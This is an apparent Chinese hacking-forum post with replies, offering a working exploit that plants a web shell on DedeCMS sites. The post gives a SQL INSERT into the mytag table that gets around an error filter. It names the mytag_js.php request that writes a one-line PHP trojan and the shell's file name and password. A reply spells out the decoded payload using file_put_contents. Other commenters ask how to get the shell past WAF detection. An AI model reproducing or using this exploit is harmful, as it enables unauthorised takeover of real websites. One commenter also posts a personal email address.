dedecms漏洞getshell EXP最新可用

看贴不回,没JJ

漏洞大家都知道是哪个。

其实我一直在玩。。郁闷 虽然这个漏洞不是我第一个发现的,以前也是朋友告诉我。

但是没公开。我承认想自己留着玩。。以前这个漏洞应该很多人知道没发出来而已。

刚看了出的几个exp .. 进后台。还得找后台路径 太麻烦了吧?

getshell 很容易 。 既然刚发出来的是 sql方法getshell 我也看到几个人发了sql增加表mytag的内容。

但是测试了下。。失败

原因: 用的语句是update 很多站 mytag 里面都没内容。那么你用update 那有什么用 修改不了任何数据。只能用 INSERT 当然,语句带#就会暴 错误。。现在要做的饶过即可。以前也出过那么多dede sql 结合饶过,成功INSERT。

构造语句:

EXP:

成功增加。

访问http://www.90sec.org/plus/mytag_js.php?aid=9013
生成一句话木马.
菜刀连接 http://www.90sec.org/plus/90sec.php 密码 guige

测试OK。

原文链接:,转发请注明来源!

发表评论

要发表评论,您必须先登录

  • 11 Responses to “dedecms漏洞getshell EXP最新可用”
    • ist

      :?: 看不懂,求解释、、怎么构造语句,exp怎么利用,求详细分享。我邮箱dianker@126.com

      • ANSIC编码:
        翻译过来就是cfg_dbprefixmytag` (aid,expbody,normbody) VALUES(9013,@`\'`,'{dede:php}file_put_contents(''90sec.php'','''');{/dede:php}') # @`\'`

        卡斯
    • 新一

      很想知道构造语句为什么会和EXP的不一样子呢。

    • haha

      想问一下 你的这些代码是用什么转成ANSIC码的? exp的代码原句子是什么样子的? 你那exp生成的马过不了狗 看到请回复 谢谢 QQ1468254412

    • Admin

      :???: 不会修改 过狗呀

    • feng

      应该怎样修改?